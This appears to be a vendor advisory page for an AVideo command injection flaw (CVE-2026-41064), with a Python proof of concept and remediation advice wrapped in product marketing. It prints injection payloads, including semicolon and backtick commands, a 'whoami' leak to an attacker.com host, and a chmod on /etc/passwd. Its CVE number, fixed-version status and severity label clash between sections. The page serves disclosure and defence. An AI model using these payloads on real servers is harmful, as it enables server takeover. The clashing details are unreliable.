CVE-2026-41064

CVE-2026-41064 is a high-severity OS command injection vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet.

Summary

The incomplete fix for AVideo's test.php adds escapeshellarg for wget but leaves the file_get_contents and curl code paths unsanitized, and the URL validation regex /^http/ accepts strings like httpevil.com.

Affected Package

  • Ecosystem: Other
  • Package: AVideo
  • Affected versions: < commit 1e6cf03e93b5
  • Patched versions: >= commit 1e6cf03e93b5

Details

The vulnerable wget() function in plugin/Live/test.php:

function wget($url, $filename) {
    $cmd = "wget --tries=1 {$url} -O {$filename} --no-check-certificate";
    exec($cmd);
}

Neither $url nor $filename is passed through escapeshellarg(). The URL validation uses preg_match("/^http/", $url) which:

  • Does not require :// (matches httpevil.com)
  • Does not block shell metacharacters (;, backticks, $())
  • Does not validate the URL is actually a URL

A payload like http://x; id > /tmp/pwned; echo passes the regex and injects arbitrary commands via the semicolons.

The fix adds escapeshellarg() for the wget path and an isAllowedStatsTestURL allowlist, but url_get_contents() (used by the same endpoint) still follows redirects without validation. The wget-specific fix does not protect the file_get_contents and curl code paths that handle the same user-supplied URL.

PoC

"""
CVE-2026-33502 - Command injection in AVideo plugin/Live/test.php

Tests REAL vulnerable code from:
  plugin/Live/test.php (commit pre-1e6cf03)

The vulnerable wget() function at the end of test.php:
  $cmd = "wget --tries=1 {$url} -O {$filename} --no-check-certificate";
  exec($cmd);

No escapeshellarg() is used on $url or $filename parameters.
The URL validation regex /^http/ is also weak (matches "httpevil.com").
"""

import re
import sys
import os
import subprocess

src_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'src')
src_content = open(os.path.join(src_dir, 'test.php')).read()

print("=" * 60)
print("CVE-2026-33502: AVideo Command Injection PoC (Real Source)")
print("=" * 60)
print()

has_weak_regex = bool(re.search(r'preg_match\("/\^http/"', src_content))
has_unsanitized_wget = 'wget --tries=1 {$url} -O {$filename}' in src_content
has_escapeshellarg = 'escapeshellarg' in src_content
has_exec = 'exec($cmd)' in src_content
has_auth_check = 'User::isAdmin()' in src_content

print("[*] Source: plugin/Live/test.php (pre-fix)")
print("[*] Weak URL regex /^http/: " + str(has_weak_regex))
print("[*] Unsanitized wget command: " + str(has_unsanitized_wget))
print("[*] escapeshellarg used: " + str(has_escapeshellarg))
print("[*] exec() used: " + str(has_exec))
print("[*] Authentication check: " + str(has_auth_check))
print()

def extract_wget_function():
    match = re.search(r'function wget\(.*?\n\}', src_content, re.DOTALL)
    if match:
        return match.group(0)
    return None

wget_func = extract_wget_function()
if wget_func:
    print("[*] Extracted real wget function:")
    for line in wget_func.split('\n'):
        print("    " + line)
    print()

def simulate_url_validation(url):
    if not url or url == "php://input":
        return False
    if not re.match(r"^http", url):
        return False
    return True

def simulate_vulnerable_wget_cmd(url, filename):
    cmd = f"wget --tries=1 {url} -O {filename} --no-check-certificate"
    return cmd

print("[*] Testing command injection payloads:")
print()

vuln_count = 0

payload = "http://x; id > /tmp/pwned; echo "
valid = simulate_url_validation(payload)
cmd = simulate_vulnerable_wget_cmd(payload, "/tmp/test123")
print(f"  Payload: {payload}")
print(f"  Passes regex: {valid}")
print(f"  Generated command: {cmd}")
if valid and '; id' in cmd:
    print("  Result: COMMAND INJECTION - 'id' will execute")
    vuln_count += 1
print()

payload2 = "http://x`whoami`.attacker.com/test"
valid2 = simulate_url_validation(payload2)
cmd2 = simulate_vulnerable_wget_cmd(payload2, "/tmp/test456")
print(f"  Payload: {payload2}")
print(f"  Passes regex: {valid2}")
print(f"  Generated command: {cmd2}")
if valid2 and '`whoami`' in cmd2:
    print("  Result: COMMAND INJECTION via backticks")
    vuln_count += 1
print()

payload3 = "httpevil.attacker.com"
valid3 = simulate_url_validation(payload3)
print(f"  Payload: {payload3}")
print(f"  Passes regex: {valid3}")
if valid3:
    print("  Result: WEAK REGEX - 'httpevil.com' matches /^http/")
    vuln_count += 1
print()

cmd4 = simulate_vulnerable_wget_cmd("http://legit.com", "/tmp/test; chmod 777 /etc/passwd")
print(f"  Filename injection command: {cmd4}")
if '; chmod' in cmd4:
    print("  Result: FILENAME INJECTION possible")
    vuln_count += 1
print()

if not has_auth_check:
    vuln_count += 1
    print("[*] No authentication required to reach test.php")
print()

if vuln_count > 0 and has_unsanitized_wget:
    print("VULNERABILITY CONFIRMED")
    sys.exit(0)
else:
    print("VULNERABILITY NOT CONFIRMED")
    sys.exit(1)

Steps to reproduce:

  1. git clone https://github.com/WWBN/AVideo /tmp/AVideo_test
  2. cd /tmp/AVideo_test && git checkout 1e6cf03e93b5a5318204b010ea28440b0d9a5ab3~1
  3. python3 poc.py

Expected output:

VULNERABILITY CONFIRMED
wget() uses unsanitized $url in shell command via exec(), and the URL regex /^http/ is too weak to prevent injection.

Suggested Remediation

  1. Use escapeshellarg() on both $url and $filename in the wget() function.
  2. Strengthen the URL regex to require ^https?:// and reject shell metacharacters.
  3. Add authentication (User::isAdmin()) to the test.php endpoint.
  4. Apply escapeshellarg() consistently across all code paths (wget, curl, file_get_contents).

Impact

An unauthenticated attacker can achieve remote code execution on the AVideo server by sending a crafted URL to plugin/Live/test.php that injects shell commands via semicolons or backticks in the wget command line. This grants full server compromise -- the attacker can read database credentials, install backdoors, or pivot to internal systems.

Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.

CVE-2026-41064 has a CVSS score of 9.3 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 29.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

No fixed version is listed for CVE-2026-41064 yet.

In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-41064? CVE-2026-41064 is a high-severity OS command injection vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
  2. How severe is CVE-2026-41064? CVE-2026-41064 has a CVSS score of 9.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-41064? wwbn/avideo (composer) versions <= 29.0 is affected.
  4. Is there a fix for CVE-2026-41064? No fixed version is listed for CVE-2026-41064 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-41064 exploitable, and should I be worried? Whether CVE-2026-41064 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-41064 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-41064? No fixed version is listed yet. In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.